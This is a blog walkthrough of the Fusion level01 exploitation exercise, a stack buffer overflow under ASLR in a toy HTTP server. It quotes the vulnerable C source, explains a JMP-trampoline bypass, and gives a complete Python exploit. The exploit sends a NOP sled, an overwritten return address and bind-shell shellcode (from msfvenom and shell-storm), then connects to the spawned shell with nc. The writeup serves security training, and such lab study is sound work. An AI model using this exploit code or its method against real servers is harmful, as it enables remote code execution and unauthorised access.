Hello readers,
Welcome Again . Today, I am going to share my another walk through experience of Exploit exercise fusion level 01. Basically, This Level is complete copy of previous level but here, the only difference is ASLR (Address Space Layout Randomization). Don't forget to Check
Exploit Exercise Fusion level 00So, Let's start.
Hint
This is a simple introduction to get you warmed up.
The return address is supplied in case your memory needs a jog :)
Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a
bad idea due to character restrictions due to realpath(). Instead, there is
plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).
Source Code
#include "../common/common.c"
int fix_path(char *path)
{
char resolved[128]
if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
strcpy(path, resolved);
}
char *parse_http_request()
{
char buffer[1024];
char *path;
char *q;
printf("[debug] buffer is at 0x%08x :-)\n", buffer);
if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");
path = &buffer[4];
q = strchr(path, ' ');
if(! q) errx(0, "No protocol version specified");
*q++ = 0;
if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
fix_path(path);
printf("trying to access %s\n", path);
return path;
}
int main(int argc, char **argv, char **envp)
{
int fd;
char *p;
background_process(NAME, UID, GID);
fd = serve_forever(PORT);
set_io(fd);
parse_http_request();
}
Here, Our problem is ALSR. well, after spending my valuable time in research and GDB testing. I found a way to bypass this problem.
Actually, Here Our Exact Problem is Random Space Of Injected Shell code Starting Point. So, We just need to point EIP to Starting of Our Shell code.
Well, Our Solution is JMP instruction. Those guys who don't know about it. Start google now. JMP instruction are like a small bytes of Instruction which Instruct EIP to Jump from One Address To Another.
Like we want to jump our EIP 39 Bytes Then Our Instruction will be
Disassembly:0: eb 25 jmp 0x27Inject like this (String Literal)
"\xEB\x25"Basically, This Command Will Instruct EIP to Jump 39 Bytes Forward From Current Position. Simple.
Further Details left over User to Understand it Yourself.
Here, is my exploit
#!/usr/bin/python
# import modules
import socket
import struct
import os
# Target Configurations
TARGET_IP = raw_input('[+] Enter Target IP [default 192.168.43.231] : ') or '192.168.43.231'
TARGET_PORT = 20001
# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# file descriptor
sf = s.makefile("rw")
# connect
s.connect((TARGET_IP, TARGET_PORT))
# ===================================================================
# Unsuccessful Payload Created From MSFVENOM
# ===================================================================
# cmd
# msfvenom -p linux/x86/shell/bind_tcp -n 200 -f py -b '\x00\xff'
buf = ""
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB\x31\xF6\x31\xFF'
buf += "\x93\x41\x2f\x43\x48\xfc\x41\x49\x9b\x9b\x93\xf9\x9b"
buf += "\x2f\xfc\x9b\xf9\x90\x3f\x92\x93\x4b\x40\x49\x49\x92"
buf += "\xf9\x37\x92\x42\x43\x41\x91\x4b\xfd\xfc\x41\x91\x4a"
buf += "\x90\x27\xf5\x27\x90\x49\x2f\xf9\x43\x48\x42\x90\x4b"
buf += "\x2f\x37\xfc\x99\xfc\xf8\x9b\x9f\x92\x37\x4b\x93\x48"
buf += "\x43\x9f\x98\xf8\xf5\x93\x40\xf5\x41\x27\x40\x93\x3f"
buf += "\x4a\x9b\x93\x37\x41\x9f\xf8\x49\xf9\x41\xf5\x49\x91"
buf += "\x41\x42\x2f\x99\x90\x99\xf5\x37\xf9\x93\x9b\x2f\xf8"
buf += "\xf8\x41\x93\xf5\x42\x93\x49\xfc\xf5\x40\x37\x4b\x90"
buf += "\x43\xd6\x9f\xd6\x48\xf8\x42\x90\x49\x49\x2f\x2f\x37"
buf += "\x43\x92\xf8\x40\x9b\xfc\x91\x9f\x40\x40\x9f\xf8\xf8"
buf += "\x9b\xfd\xf9\x92\x91\x98\x42\x43\xfc\x49\x90\x9b\x98"
buf += "\x42\x98\x9b\x3f\x27\x40\xf8\xfd\x99\xf5\xfc\x4a\x27"
buf += "\xf8\x27\xfd\x43\x37\x49\x92\x9b\x49\x9f\x43\xd6\x92"
buf += "\x27\xfd\x4b\xfd\xf8\x49\x9f\xfc\xf8\x4a\x48\x49\x4b"
buf += "\x4b\x49\x99\x40\x92\xbe\x99\x74\x93\xf3\xda\xcb\xd9"
buf += "\x74\x24\xf4\x5d\x31\xc9\xb1\x1c\x31\x75\x14\x83\xed"
buf += "\xfc\x03\x75\x10\x7b\x81\xf9\x8e\x23\xf3\x4c\x77\x6a"
buf += "\x03\xa1\x78\x8c\x8d\x22\x1e\x0d\x6e\xa4\x2f\xc0\xf1"
buf += "\x94\x14\x2d\x12\x85\xe9\x82\xbf\x28\x67\xc5\xf0\x4b"
buf += "\xba\x85\xa0\xf9\x40\xd1\x28\xfc\x22\xd8\xfc\x97\x3a"
buf += "\x3b\x96\x99\x67\xd1\x01\xfe\x5a\xa5\x59\x7d\xa0\xb1"
buf += "\x3c\xd9\x77\xeb\xd6\xdf\x87\x1a\x7b\x8a\x97\x4d\xd3"
buf += "\xc3\x79\x07\xb5\x8b\xb4\x57\xe8\xcf\xf7\x31\xc6\x90"
buf += "\xa8\xfe\x68\xf6\xc1\x51\x8d\x3a\x51\xc2\x3b\xc8\xe2"
buf += "\xe7\x8e\x51\x85\x38\x4b\xe2\x8c\x0b\xec\xfd\x70"
# ================================================================
# Another Payload,
# ===============================================================
# url :
# http://shell-storm.org/shellcode/files/shellcode-882.php
buf = ''
buf +="\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
payload = ''
payload += 'GET '
payload += '\x90'*137 + '\xeb\x25'
payload+= struct.pack("I", 0x80488b9)
payload += '/' # <--- To Stop Realpath function from overwriting return address
payload += '\x90'*200
# ShellCode here
payload += buf
payload += '\x90'*400
payload+= ' HTTP/1.1'
s.send(payload)
#print sf.read(30)
s.settimeout(3)
s.settimeout(3)
print "[+] Wait For Response"
try:
print [sf.read(len('trying to access %s\n')+10)]
print "[-] If You Are Reading This Message Then Probably Exploit failed."
input("[-] Exit. Trying Again..")
s.close()
except:
print "[+] Starting Bind TCP Shell."
print "[+] Use Commands Carefully."
os.system('nc {} 1337'.format(TARGET_IP))
Check
Exploit Exercise Fusion level 00Don't forget to comment below some appreciable sentences.